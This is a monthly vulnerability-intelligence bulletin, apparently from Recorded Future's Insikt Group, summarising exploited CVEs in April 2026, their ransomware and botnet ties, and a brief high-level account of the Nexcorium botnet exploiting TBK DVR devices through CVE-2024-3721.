In April 2026, Insikt Group® pinpointed a total of 37 crucial vulnerabilities needing urgent remediation. Impressively, 35 of these were assigned a Very Critical Recorded Future Risk Score, indicating a 19% uptick from the previous month.
Among these vulnerabilities, 31 were included in the US Cybersecurity and Infrastructure Security Agency (CISA)’s Known Exploited Vulnerabilities (KEV) catalog, while six were identified solely through honeypot data, available only to Recorded Future clients.
The vulnerabilities impacted products from 23 different vendors, with Microsoft representing roughly 22% of the exposure. The remaining vulnerabilities were primarily found in enterprise-focused vendors, spanning security management tools, collaboration platforms, development software, and network infrastructure.
In response to newly identified risks, Insikt Group has developed Nuclei templates specifically for authentication vulnerabilities in Nginx UI (CVE-2026-33032) and Marimo (CVE-2026-39987), accessible solely to Recorded Future customers.
April 2026 Vulnerability Snapshot
All 31 vulnerabilities listed below were actively exploited throughout April 2026, excluding the 6 tied to honeypot data. Examples of public proof-of-concept (PoC) exploits identified by Insikt Group® are included, although they haven't been verified for effectiveness. Vulnerability management teams should approach these PoCs with caution.
Score
✓
(available to Recorded Future Customers)
Table 1: This table outlines vulnerabilities that were actively exploited in April, utilizing Recorded Future data (excluding honeypot-sourced CVEs).
Trends and Observations: April 2026
- Seven out of the identified vulnerabilities were connected to ransomware. Six specifically related to the Medusa ransomware operations run by Storm-1175.
- CISA linked CVE-2026-41940 to ransomware activity associated with a group known as Sorry Ransomware.
- Attackers also exploited CVE-2024-3721 in TBK DVR devices, enabling the Nexcorium botnet deployment.
- Remote code execution (RCE) was enabled by 16 of the vulnerabilities, impacting products from various vendors including Adobe, Microsoft, and Fortinet.
- Of the 37 vulnerabilities, public PoC exploits were identified for 24, with common flaws being CWE-22 (Path Traversal) and CWE-94 (Code Injection).
- Notably, three vulnerabilities were at least five years old, with the oldest dating back approximately 17 years, underscoring the persistence of legacy vulnerabilities in unpatched environments.
- The duration from public disclosure to exploitation was alarmingly short, observed at just two days in some cases.
Focused Exploitation Analysis
This section highlights some of the most impactful, actively exploited vulnerabilities linked to recognized threat campaigns. These were chosen due to their public PoC availability or the existence of Nuclei templates for detection created by Insikt Group®.
Nexcorium Campaign Targets TBK DVR Vulnerability (CVE-2024-3721)
On April 17, 2026, FortiGuard Labs (@FortiGuardLabs on X, previously Twitter) released a technical analysis correlating a campaign with Nexcorium, a botnet derived from Mirai, exploiting TBK DVR devices via CVE-2024-3721. This OS command injection vulnerability permits remote attack vectors allowing unauthorized execution of system commands.
FortiGuard Labs illustrated that the campaign exploits CVE-2024-3721 through crafted requests manipulating specific arguments in TBK DVRs, leading to the download of a script named dvr, which retrieves and executes Nexcorium binaries. The script sets permissions to 777, executing the binaries with arguments signifying the compromised system.
For additional technical insights and indicators of compromise, Recorded Future customers can refer to Insikt Group's reporting, which also includes access to Malware Intelligence queries, surfacing samples connected to known network indicators.
